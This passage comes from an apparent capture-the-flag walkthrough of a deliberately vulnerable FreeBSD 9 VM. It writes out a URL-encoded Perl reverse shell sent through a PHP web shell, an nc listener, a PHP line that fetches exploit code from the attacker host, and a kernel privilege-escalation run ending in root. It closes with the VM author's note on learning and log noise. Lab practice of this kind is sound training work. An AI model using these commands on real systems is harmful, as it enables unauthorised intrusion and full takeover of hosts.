root   1341   0.0  0.1  12184   1372  v4  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1342   0.0  0.1  12184   1372  v5  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1343   0.0  0.1  12184   1372  v6  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1344   0.0  0.1  12184   1372  v7  Is+   7:26AM  0:00.00 /usr/libexec/ge

Let's try with Perl:
http://192.168.180.137:8080/phptax/data/rce.php?cmd=perl%20-MIO%20-e%20%27$p=fork;exit,if%28$p%29;$c=new%20IO::Socket::INET%28PeerAddr,%22192.168.180.132:443%22%29;STDIN-%3Efdopen%28$c,r%29;$~-%3Efdopen%28$c,w%29;system$_%20while%3C%3E;%27

On our end:
nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.137] 30456
whoami
www

ps -aux
USER    PID  %CPU %MEM    VSZ    RSS  TT  STAT STARTED     TIME COMMAND
root     11  98.0  0.0      0     16  ??  RL    7:26AM 69:10.59 [idle]
root   1294   1.0  7.5 111632  76844  v0- S     7:26AM  1:13.97 /usr/local/bin/
root      0   0.0  0.0      0    160  ??  DLs   7:26AM  0:00.04 [kernel]
root      1   0.0  0.1   6280    604  ??  ILs   7:26AM  0:00.00 /sbin/init --
root      2   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [mpt_recovery0]
root      3   0.0  0.0      0     16  ??  DL    7:26AM  0:00.01 [fdc0]
root      4   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [sctp_iterator]
root      5   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [xpt_thrd]
root      6   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [pagedaemon]
root      7   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [vmdaemon]
root      8   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [pagezero]
root      9   0.0  0.0      0     16  ??  DL    7:26AM  0:00.01 [bufdaemon]
root     10   0.0  0.0      0     16  ??  DL    7:26AM  0:00.00 [audit]
root     12   0.0  0.0      0    224  ??  WL    7:26AM  0:03.02 [intr]
root     13   0.0  0.0      0     48  ??  DL    7:26AM  0:00.47 [geom]
root     14   0.0  0.0      0     16  ??  DL    7:26AM  0:00.09 [yarrow]
root     15   0.0  0.0      0     16  ??  DL    7:26AM  0:00.12 [syncer]
root     16   0.0  0.0      0     16  ??  DL    7:26AM  0:00.01 [vnlru]
root     17   0.0  0.0      0     16  ??  DL    7:26AM  0:00.02 [softdepflush]
root    105   0.0  0.1  10060   1212  ??  Is    7:26AM  0:00.00 adjkerntz -i
root    559   0.0  0.2  10052   1576  ??  Is    7:26AM  0:00.00 dhclient: em0 [
_dhcp   625   0.0  0.2  10052   1712  ??  Is    7:26AM  0:00.01 dhclient: em0 (
root    641   0.0  0.3  10372   3488  ??  Is    7:26AM  0:00.00 /sbin/devd
root    833   0.0  0.2  12184   1628  ??  Is    7:26AM  0:00.01 /usr/sbin/syslo
root    977   0.0  0.2  10056   1560  ??  S     7:26AM  0:00.01 /usr/local/osse
ossec   981   0.0  0.3  10052   3404  ??  I     7:26AM  0:00.59 /usr/local/osse
root    985   0.0  0.2  10052   1628  ??  S     7:26AM  0:00.04 /usr/local/osse
root    989   0.0  0.2  10052   2128  ??  I     7:26AM  0:01.48 /usr/local/osse
ossec   993   0.0  0.2  10052   1800  ??  S     7:26AM  0:00.00 /usr/local/osse
mysql  1098   0.0  0.2  14636   1964  ??  Is    7:26AM  0:00.00 /bin/sh /usr/lo
mysql  1178   0.0  4.6 219884  47144  ??  I     7:26AM  0:00.55 /usr/local/libe
root   1192   0.0  1.3 206796  13556  ??  Ss    7:26AM  0:00.16 /usr/local/sbin
root   1220   0.0  0.4  20384   4116  ??  Ss    7:26AM  0:00.04 sendmail: accep
smmsp  1224   0.0  0.4  20384   4128  ??  Is    7:26AM  0:00.00 sendmail: Queue
root   1230   0.0  0.2  14260   1716  ??  Ss    7:26AM  0:00.01 /usr/sbin/cron
www    1241   0.0  2.0 210892  20464  ??  I     7:26AM  0:00.09 /usr/local/sbin
www    1242   0.0  2.1 210892  21756  ??  I     7:26AM  0:00.04 /usr/local/sbin
www    1243   0.0  2.1 210892  21768  ??  I     7:26AM  0:00.04 /usr/local/sbin
www    1244   0.0  2.1 210892  21768  ??  I     7:26AM  0:00.04 /usr/local/sbin
www    1245   0.0  2.1 210892  21768  ??  I     7:26AM  0:00.04 /usr/local/sbin
root   1277   0.0  0.4  26404   3888  ??  I     7:26AM  0:01.48 /usr/local/lib/
www    1353   0.0  2.1 210892  21768  ??  I     7:28AM  0:00.12 /usr/local/sbin
www    1494   0.0  1.4 206796  14552  ??  S     7:56AM  0:00.01 /usr/local/sbin
www    1631   0.0  0.5  30260   5572  ??  S     8:34AM  0:00.00 perl -MIO -e $p
www    1643   0.0  0.1  14328   1472  ??  R     8:37AM  0:00.00 ps -aux
root   1337   0.0  0.1  12184   1372  v0  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1338   0.0  0.1  12184   1372  v1  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1339   0.0  0.1  12184   1372  v2  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1340   0.0  0.1  12184   1372  v3  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1341   0.0  0.1  12184   1372  v4  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1342   0.0  0.1  12184   1372  v5  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1343   0.0  0.1  12184   1372  v6  Is+   7:26AM  0:00.00 /usr/libexec/ge
root   1344   0.0  0.1  12184   1372  v7  Is+   7:26AM  0:00.00 /usr/libexec/ge

We already know from the passwd file header (release/9.0.0) that this is FreeBSD 9.0, so it is time to exploit:
https://www.exploit-db.com/exploits/28718/

We download the file with this PHP snippet I have prepared:
echo "<?php file_put_contents('28718.c', fopen('http://192.168.180.132/28718.c', 'r')); ?>" > down2.php

./28718
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!

ls /root/
.cshrc
.history
.k5login
.login
.mysql_history
.profile
congrats.txt
folderMonitor.log
httpd-access.log
lazyClearLog.sh
monitor.py
ossec-alerts.log


cat /root/congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basic skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targeted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
Its default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory.
Lastly, the ossec-alerts.log file is where OSSEC-HIDS puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)

Best Regards,
Yuriy Stanchev/URIX


References:
https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/